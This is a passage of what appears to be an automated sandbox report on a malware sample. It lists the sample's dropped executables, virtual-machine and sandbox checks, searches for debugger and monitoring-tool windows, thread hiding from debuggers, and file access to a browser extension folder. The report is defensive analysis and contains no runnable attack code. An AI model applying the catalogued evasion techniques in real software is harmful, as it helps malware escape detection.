                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exeProcess information set: NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exeProcess information set: NOGPFAULTERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2757.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2757.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2757.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2757.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2757.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2757.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

                      barindex
                      Tries to evade analysis by execution special instruction which cause usermode exceptionShow sources
                      Source: C:\Users\user\AppData\Local\Temp\2757.exeSpecial instruction interceptor: First address: 0000000001002ADA instructions 0F3F070BC745FCFFFFFFFF33C033D2 caused by: Unknown instruction #UD exception
                      Source: C:\Users\user\AppData\Local\Temp\2757.exeSpecial instruction interceptor: First address: 0000000001007252 instructions 0F0B caused by: Known instruction #UD exception
                      Source: C:\Users\user\AppData\Local\Temp\2757.exeSpecial instruction interceptor: First address: 000000000100C8EB instructions 0F0B caused by: Known instruction #UD exception
                      Source: C:\Users\user\AppData\Local\Temp\2757.exeSpecial instruction interceptor: First address: 0000000001013E54 instructions 0F0B caused by: Known instruction #UD exception
                      Source: C:\Users\user\AppData\Local\Temp\2757.exeSpecial instruction interceptor: First address: 0000000001015916 instructions 0F0B caused by: Known instruction #UD exception
                      Source: C:\Users\user\AppData\Local\Temp\2757.exeSpecial instruction interceptor: First address: 0000000001015A9A instructions 0F3F070BC745FCFFFFFFFF33C033D2 caused by: Unknown instruction #UD exception
                      Source: C:\Users\user\AppData\Local\Temp\2757.exeSpecial instruction interceptor: First address: 0000000001015A90 instructions 0F0B caused by: Known instruction #UD exception
                      Source: C:\Users\user\AppData\Local\Temp\2757.exeSpecial instruction interceptor: First address: 00000000013FC12F instructions 0F0B caused by: Known instruction #UD exception
                      Source: C:\Users\user\AppData\Local\Temp\2757.exeSpecial instruction interceptor: First address: 000000000100BC35 instructions 0F0B caused by: Known instruction #UD exception
                      Query firmware table information (likely to detect VMs)Show sources
                      Source: C:\Users\user\AppData\Local\Temp\2757.exeSystem information queried: FirmwareTableInformation
                      Tries to detect sandboxes / dynamic malware analysis system (registry check)Show sources
                      Source: C:\Users\user\AppData\Local\Temp\2757.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                      Source: 2997.exe, 00000011.00000002.370102602.0000000000794000.00000004.00000001.sdmpBinary or memory string: ASWHOOK
                      Checks if the current machine is a virtual machine (disk enumeration)Show sources
                      Source: C:\Users\user\Desktop\nkINykHreE.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\Desktop\nkINykHreE.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\Desktop\nkINykHreE.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\Desktop\nkINykHreE.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\Desktop\nkINykHreE.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\Desktop\nkINykHreE.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Roaming\haifbcdKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Roaming\haifbcdKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Roaming\haifbcdKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Roaming\haifbcdKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Roaming\haifbcdKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Roaming\haifbcdKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Local\Temp\2997.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Local\Temp\2997.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Local\Temp\2997.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Local\Temp\2997.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Local\Temp\2997.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Local\Temp\2997.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Roaming\scifbcdKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Roaming\scifbcdKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Roaming\scifbcdKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Roaming\scifbcdKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Roaming\scifbcdKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Roaming\scifbcdKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Windows\explorer.exe TID: 6672Thread sleep count: 581 > 30
                      Source: C:\Windows\explorer.exe TID: 6680Thread sleep count: 211 > 30
                      Source: C:\Windows\explorer.exe TID: 6676Thread sleep count: 279 > 30
                      Source: C:\Windows\explorer.exe TID: 7028Thread sleep count: 385 > 30
                      Source: C:\Windows\explorer.exe TID: 4080Thread sleep count: 143 > 30
                      Source: C:\Windows\explorer.exe TID: 7072Thread sleep count: 157 > 30
                      Source: C:\Windows\explorer.exe TID: 5684Thread sleep count: 373 > 30
                      Source: C:\Windows\explorer.exe TID: 5772Thread sleep count: 185 > 30
                      Source: C:\Windows\explorer.exe TID: 5688Thread sleep count: 142 > 30
                      Source: C:\Windows\System32\svchost.exe TID: 6492Thread sleep time: -30000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exe TID: 5712Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\svchost.exe TID: 4972Thread sleep count: 44 > 30
                      Source: C:\Windows\SysWOW64\svchost.exe TID: 4972Thread sleep time: -44000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\2757.exe TID: 5800Thread sleep count: 66 > 30
                      Source: C:\Users\user\AppData\Local\Temp\4187.exe TID: 6920Thread sleep time: -60000s >= -30000s
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 581
                      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 385
                      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 373
                      Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\4BED.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\2757.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\sqlite3[1].dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\2757.exeRegistry key enumerated: More than 150 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                      Source: C:\Users\user\AppData\Local\Temp\2757.exeFile opened / queried: VBoxGuest
                      Source: C:\Users\user\AppData\Local\Temp\2757.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                      Source: C:\Users\user\AppData\Local\Temp\2757.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                      Source: C:\Users\user\AppData\Local\Temp\2757.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeCode function: 19_2_00CB428C sldt word ptr [eax]
                      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\2757.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
                      Source: C:\Users\user\AppData\Local\Temp\2757.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
                      Source: C:\Users\user\AppData\Local\Temp\2757.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
                      Source: C:\Users\user\AppData\Local\Temp\2757.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
                      Source: C:\Users\user\AppData\Local\Temp\2757.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
                      Source: C:\Users\user\AppData\Local\Temp\2757.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
                      Source: svchost.exe, 00000004.00000002.541068406.000002024F62A000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW ?
                      Source: explorer.exe, 00000003.00000000.260652966.000000000891C000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
                      Source: CBA.exeBinary or memory string: GT2EIAjAGm5qklVOONCYigE5tZUjotUEjRY/2opRQtiq+6wTeNE/rq1pj8njZK0Q/UO/1ciYEsPM0m6Za/DqcZpEMR9PAn3HlJ7abKBdphlyhgfStmoYllm2nj4zb04la3
                      Source: explorer.exe, 00000003.00000000.282298722.0000000003710000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 00000003.00000000.256022995.0000000003767000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
                      Source: svchost.exe, 00000004.00000002.594562074.0000020254C62000.00000004.00000001.sdmpBinary or memory string: @Hyper-V RAW
                      Source: 2757.exe, 00000027.00000002.628690320.000000002F994000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: svchost.exe, 00000004.00000002.592027027.0000020254C4C000.00000004.00000001.sdmp, 4187.exe, 0000002A.00000002.597913891.0000000002734000.00000004.00000001.sdmp, 4187.exe, 0000002A.00000002.593363171.000000000270F000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                      Source: explorer.exe, 00000003.00000000.281048957.00000000011B3000.00000004.00000020.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
                      Source: explorer.exe, 00000003.00000000.260720434.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
                      Source: explorer.exe, 00000003.00000000.283347822.00000000053C4000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
                      Source: explorer.exe, 00000003.00000000.260720434.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
                      Source: 4187.exe, 0000002A.00000002.597913891.0000000002734000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW`
                      Source: svchost.exe, 00000005.00000002.538342411.00000175AA83E000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.517850070.000001FB83829000.00000004.00000001.sdmp, svchost.exe, 00000022.00000002.559905618.0000000003200000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\nkINykHreE.exeProcess information queried: ProcessInformation
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeCode function: 18_2_00401D96 CreateThread,GetVersionExA,GetSystemInfo,GetModuleHandleA,GetProcAddress,GetCurrentProcess,GetTickCount,
                      Source: C:\Users\user\Desktop\nkINykHreE.exeSystem information queried: ModuleInformation

                      Anti Debugging:

                      barindex
                      Tries to detect sandboxes and other dynamic analysis tools (window names)Show sources
                      Source: C:\Users\user\AppData\Local\Temp\2757.exeOpen window title or class name: regmonclass
                      Source: C:\Users\user\AppData\Local\Temp\2757.exeOpen window title or class name: gbdyllo
                      Source: C:\Users\user\AppData\Local\Temp\2757.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                      Source: C:\Users\user\AppData\Local\Temp\2757.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                      Source: C:\Users\user\AppData\Local\Temp\2757.exeOpen window title or class name: procmon_window_class
                      Source: C:\Users\user\AppData\Local\Temp\2757.exeOpen window title or class name: ollydbg
                      Source: C:\Users\user\AppData\Local\Temp\2757.exeOpen window title or class name: filemonclass
                      Source: C:\Users\user\AppData\Local\Temp\2757.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                      Source: C:\Users\user\AppData\Local\Temp\2757.exeOpen window title or class name: windbgframeclass
                      Hides threads from debuggersShow sources
                      Source: C:\Users\user\AppData\Local\Temp\2757.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Local\Temp\2757.exeThread information set: HideFromDebugger
                      Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))Show sources
                      Source: C:\Users\user\Desktop\nkINykHreE.exeSystem information queried: CodeIntegrityInformation
                      Source: C:\Users\user\AppData\Roaming\haifbcdSystem information queried: CodeIntegrityInformation
                      Source: C:\Users\user\AppData\Local\Temp\2997.exeSystem information queried: CodeIntegrityInformation
                      Source: C:\Users\user\Desktop\nkINykHreE.exeCode function: 0_2_004309A0 LoadLibraryW,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,
                      Source: C:\Users\user\Desktop\nkINykHreE.exeCode function: 0_2_00540042 push dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Roaming\haifbcdCode function: 13_2_00470042 push dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\115B.exeCode function: 14_2_00470042 push dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\115B.exeCode function: 14_2_006C5C0F push dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\2997.exeCode function: 17_2_007877AB push dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeCode function: 18_2_0054092B mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeCode function: 18_2_00540D90 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeCode function: 18_2_00773572 push dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exeCode function: 31_2_0054092B mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exeCode function: 31_2_00540D90 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\nkINykHreE.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Roaming\haifbcdProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\2997.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Roaming\scifbcdProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\2757.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\2757.exeProcess queried: DebugObjectHandle
                      Source: C:\Users\user\AppData\Local\Temp\2757.exeProcess queried: DebugFlags
                      Source: C:\Users\user\AppData\Local\Temp\2757.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\2757.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\2757.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\2757.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\2757.exeProcess queried: DebugObjectHandle
                      Source: C:\Users\user\AppData\Local\Temp\2757.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\2757.exeProcess queried: DebugObjectHandle
                      Source: C:\Users\user\AppData\Local\Temp\2757.exeFile opened: NTICE
                      Source: C:\Users\user\AppData\Local\Temp\2757.exeFile opened: SICE
                      Source: C:\Users\user\Desktop\nkINykHreE.exeCode function: 0_2_00426900 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\Desktop\nkINykHreE.exeCode function: 0_2_0041C6FF SetLastError,GetProfileStringW,WriteProfileSectionW,GetProfileStringA,GetLastError,GetSystemWow64DirectoryW,GetWindowsDirectoryA,GetCPInfoExA,GetDiskFreeSpaceExA,GetStartupInfoA,ReadConsoleOutputCharacterW,GlobalUnWire,GetProcessHeap,GetProcessHeaps,WritePrivateProfileStringW,GetPriorityClass,
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess token adjusted: Debug
                      Source: C:\Users\user\Desktop\nkINykHreE.exeCode function: 1_1_004027ED LdrLoadDll,
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeMemory allocated: page read and write | page guard
                      Source: C:\Users\user\Desktop\nkINykHreE.exeCode function: 0_2_00426900 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\Desktop\nkINykHreE.exeCode function: 0_2_004229B0 _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Users\user\Desktop\nkINykHreE.exeCode function: 0_2_004222D0 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\Desktop\nkINykHreE.exeCode function: 0_2_004327E0 SetUnhandledExceptionFilter,
